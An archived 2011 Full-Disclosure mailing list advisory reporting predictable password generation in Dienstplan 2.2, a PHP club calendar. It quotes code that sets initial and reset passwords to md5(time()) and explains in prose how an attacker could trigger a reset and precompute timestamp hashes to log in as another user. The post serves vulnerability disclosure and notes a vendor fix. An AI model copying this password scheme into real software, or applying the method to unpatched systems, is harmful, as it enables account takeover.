'[Full-disclosure] Dienstplan 2.2 predictive password generation'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] Dienstplan 2.2 predictive password generation
From:       Dan Luedtke <maildanrl () googlemail ! com>
Date:       2011-08-29 7:23:27
Message-ID: CAAfuxnLJgZbeq1x-JUBvUBaGq0mxZ1H4B5nP-SM56zPv1gCHSA () mail ! gmail ! com
[Download RAW message or body]

Disocvered on Tue, 07 Jun 2011
by Dan Luedtke http://www.danrl.de

Abstract
========
Calendar application Dienstplan 2.2 uses predictive passwords in
user-creation and password-reset routines.


About Dienstplan
================
Dienstplan is a web-based calendar application written in PHP targeting
clubs and associations. Registered users may RSVP to sheduled events.
See http://www.thomas-gubisch.de/dienstplan.html for further
information.


Vulnerable Versions
===================
Tested on Dienstplan 2.2, others may be vulnerable


Predictive Password Generation (1/2)
====================================
When a new account is created, the password is derived from the
time()-function, which gives back the current UNIX TIME STAMP. A
non-salted md5-hash of UNIX TIME STAMP becomes the initial password and
is valid until the users changes the password manually.

--[ user_func.php lines 46-49 ]--
        // id = 0 -> new user
        if($id == 0)
                $id = master_addUser($username, $email, md5(time()));
        else
--

An attacker (roughly) knowing when a user account was created can
predict the password.


Predictive Password Generation (2/2)
====================================
A user can reset his own password. Unfortunately, everyone having access
to the application via browser can trigger this process for every known
user (e.g. admin). The application then generates a new password as
shown below. The new password is mailed to the user it was generated
for.

--[ user_func.php line 134 ]--
        $password = md5(time());
--

An attacker might predict the password, or a set of possible passwords,
by precalculating the md5-hashes of past, current, and future UNIX TIME
STAMPs (e.g. +/-10 seconds, depends on server's offset). He may trigger
the password reset process and log in with one of the precalculated
passwords.


Remarks
=======
* Author responded in less than 24h. A fix was provided soon after that.
* Disclosure has been delayed for 2+ months for users to update their
software.



regards,
   danrl


-- 
Dan Luedtke
http://www.danrl.de (private)
http://www.dlitc.com (company)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic